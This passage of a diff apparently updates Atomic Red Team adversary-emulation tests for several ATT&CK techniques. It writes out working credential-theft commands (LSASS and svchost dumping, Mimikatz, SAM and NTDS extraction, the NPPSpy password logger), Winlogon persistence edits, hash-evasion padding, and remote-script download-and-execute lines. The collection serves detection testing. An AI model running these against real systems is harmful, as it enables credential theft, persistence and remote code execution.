via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
```
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with `command_prompt`!
```
procdump.exe -accepteula -ma lsass.exe #{output_file}
```
<br/>
<br/>
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with these steps!
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
<br/>
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
#### Run it with `command_prompt`!
```
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```
<br/>
atomics/T1003/T1003.yaml
+124 -97
View File
@@ -1,107 +1,134 @@
---
attack_technique: T1003
display_name: OS Credential Dumping
display_name: Credential Dumping
atomic_tests:
- name: Powershell Mimikatz
description: |
Dumps Credentials via Powershell by invoking a remote mimikatz script
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1
executor:
name: powershell
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
- name: Gsecdump
auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9
description: |
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's following by two 32 characters hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator)
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: String
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
dependencies:
- description: |
Gsecdump must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
Move-Item $binpath "#{gsecdump_exe}"
}
- windows
executor:
command: |
#{gsecdump_exe} -a
name: command_prompt
elevation_required: true
- name: Credential Dumping with NPPSpy
auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
description: |-
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
executor:
command: |-
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
cleanup_command: |-
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value $cleanupUpdatedValue
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recurse -ErrorAction Ignore
Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump svchost.exe to gather RDP credentials
auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9
description: |
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
supported_platforms:
- windows
executor:
command: |
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
cleanup_command: |
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
gsecdump -a
- name: Windows Credential Editor
description: |
http://www.ampliasecurity.com/research/windows-credentials-editor/
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: output.txt
executor:
name: command_prompt
command: |
wce -o #{output_file}
- name: Registry dump of SAM, creds, and secrets
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
supported_platforms:
- windows
executor:
name: command_prompt
command: |
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: manual
steps: |
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Atomic_Red_Team
executor:
name: command_prompt
command: |
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
atomics/T1004/T1004.md
+76
View File
@@ -0,0 +1,76 @@
# T1004 - Winlogon Helper DLL
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004)
<blockquote>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell)
- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell)
- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)
<br/>
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
#### Run it with `powershell`!
```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
<br/>
atomics/T1547.004/T1547.004.yaml → atomics/T1004/T1004.yaml
+18 -20
View File
@@ -1,61 +1,59 @@
attack_technique: T1547.004
display_name: 'Boot or Logon Autostart Execution: Winlogon Helper DLL'
---
attack_technique: T1004
display_name: Winlogon Helper DLL
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38
description: |
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
supported_platforms:
- windows
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
cleanup_command: |
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
name: powershell
- name: Winlogon Userinit Key Persistence - PowerShell
auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
description: |
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
supported_platforms:
- windows
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
cleanup_command: |
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
name: powershell
- name: Winlogon Notify Key Logon Persistence - PowerShell
auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
description: |
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
supported_platforms:
- windows
- windows
input_arguments:
binary_to_execute:
description: Path of notification package to execute
type: Path
default: C:\Windows\Temp\atomicNotificationPackage.dll
executor:
name: powershell
command: |
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
cleanup_command: |
Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore
name: powershell
atomics/T1006/T1006.md
-56
View File
@@ -1,56 +0,0 @@
# T1006 - Direct Volume Access
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1006)
<blockquote>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1---read-volume-boot-sector-via-dos-device-path-powershell)
<br/>
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)
This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
```
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS
```
**Supported Platforms:** Windows
**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| volume | Drive letter of the volume to access | string | C:|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$buffer = New-Object byte[] 11
$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
$handle.Read($buffer, 0, $buffer.Length)
$handle.Close()
Format-Hex -InputObject $buffer
```
<br/>
atomics/T1006/T1006.yaml
-31
View File
@@ -1,31 +0,0 @@
attack_technique: T1006
display_name: Direct Volume Access
atomic_tests:
- name: Read volume boot sector via DOS device path (PowerShell)
auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
description: |-
This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
```
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS
```
supported_platforms:
- windows
input_arguments:
volume:
description: Drive letter of the volume to access
type: string
default: 'C:'
executor:
command: |
$buffer = New-Object byte[] 11
$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
$handle.Read($buffer, 0, $buffer.Length)
$handle.Close()
Format-Hex -InputObject $buffer
name: powershell
elevation_required: true
atomics/T1007/T1007.md
+17 -47
View File
@@ -1,6 +1,6 @@
# T1007 - System Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.</blockquote>
## Atomic Tests
@@ -12,71 +12,41 @@
<br/>
## Atomic Test #1 - System Service Discovery
Identify system services.
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
Identify system services
**Supported Platforms:** Windows
**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of service to start stop, query | string | svchost.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#### Run it with `command_prompt`!
```
tasklist.exe
sc query
sc query state= all
sc start #{service_name}
sc stop #{service_name}
wmic service where (displayname like "#{service_name}") get name
```
<br/>
<br/>
## Atomic Test #2 - System Service Discovery - net.exe
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s
**Supported Platforms:** Windows
**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:&#92;Windows&#92;Temp&#92;service-list.txt|
| output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
#### Run it with `command_prompt`!
```
net.exe start >> #{output_file}
```
#### Cleanup Commands:
```cmd
del /f /q /s #{output_file} >nul 2>&1
```
<br/>
atomics/T1007/T1007.yaml
+18 -14
View File
@@ -1,38 +1,42 @@
---
attack_technique: T1007
display_name: System Service Discovery
atomic_tests:
- name: System Service Discovery
auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71
description: |
Identify system services.
Identify system services
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
supported_platforms:
- windows
- windows
input_arguments:
service_name:
description: Name of service to start stop, query
type: string
default: svchost.exe
executor:
name: command_prompt
command: |
tasklist.exe
sc query
sc query state= all
name: command_prompt
elevation_required: true
sc start #{service_name}
sc stop #{service_name}
wmic service where (displayname like "#{service_name}") get name
- name: System Service Discovery - net.exe
auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
description: |
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s
supported_platforms:
- windows
- windows
input_arguments:
output_file:
description: Path of file to hold net.exe output
type: Path
default: C:\Windows\Temp\service-list.txt
executor:
name: command_prompt
command: |
net.exe start >> #{output_file}
cleanup_command: |
del /f /q /s #{output_file} >nul 2>&1
name: command_prompt
atomics/T1009/T1009.md
+27
View File
@@ -0,0 +1,27 @@
# T1009 - Binary Padding
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1009)
<blockquote>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
<br/>
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
Uses dd to add a zero to the binary to change the hash
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
#### Run it with `sh`!
```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
<br/>
atomics/T1009/T1009.yaml
+21
View File
@@ -0,0 +1,21 @@
---
attack_technique: T1009
display_name: Binary Padding
atomic_tests:
- name: Pad Binary to Change Hash - Linux/macOS dd
description: |
Uses dd to add a zero to the binary to change the hash
supported_platforms:
- macos
- linux
input_arguments:
file_to_pad:
description: Path of binary to be padded
type: Path
default: /tmp/evil-binary
executor:
name: sh
command: |
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
atomics/T1010/T1010.md
+10 -42
View File
@@ -1,6 +1,8 @@
# T1010 - Application Window Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</blockquote>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.</blockquote>
## Atomic Tests
@@ -12,52 +14,18 @@
## Atomic Test #1 - List Process Main Windows - C# .NET
Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
#### Inputs:
| Name | Description | Type | Default Value |
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
| output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|
| input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
| output_file_name | Name of output binary | string | T1010.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#### Run it with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
#### Cleanup Commands:
```cmd
del /f /q /s #{output_file_name} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
##### Check Prereq Commands:
```powershell
if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
```
<br/>
atomics/T1010/T1010.yaml
+8 -18
View File
@@ -1,37 +1,27 @@
---
attack_technique: T1010
display_name: Application Window Discovery
atomic_tests:
- name: List Process Main Windows - C# .NET
auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
description: |
Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
supported_platforms:
- windows
- windows
input_arguments:
input_source_code:
description: Path to source of C# code
type: path
default: PathToAtomicsFolder\T1010\src\T1010.cs
default: C:\AtomicRedTeam\atomics\T1010\src\T1010.cs
output_file_name:
description: Name of output binary
type: string
default: '%TEMP%\T1010.exe'
dependency_executor_name: powershell
dependencies:
- description: |
T1010.cs must exist on disk at specified location (#{input_source_code})
prereq_command: |
if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
default: T1010.exe
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
cleanup_command: |
del /f /q /s #{output_file_name} >nul 2>&1
name: command_prompt
atomics/T1012/T1012.md
+20 -27
View File
@@ -1,8 +1,8 @@
# T1012 - Query Registry
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012)
<blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.</blockquote>
## Atomic Tests
@@ -12,37 +12,33 @@ The Registry contains a significant amount of information about the operating sy
<br/>
## Atomic Test #1 - Query Registry
Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
Query Windows Registry
References:
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
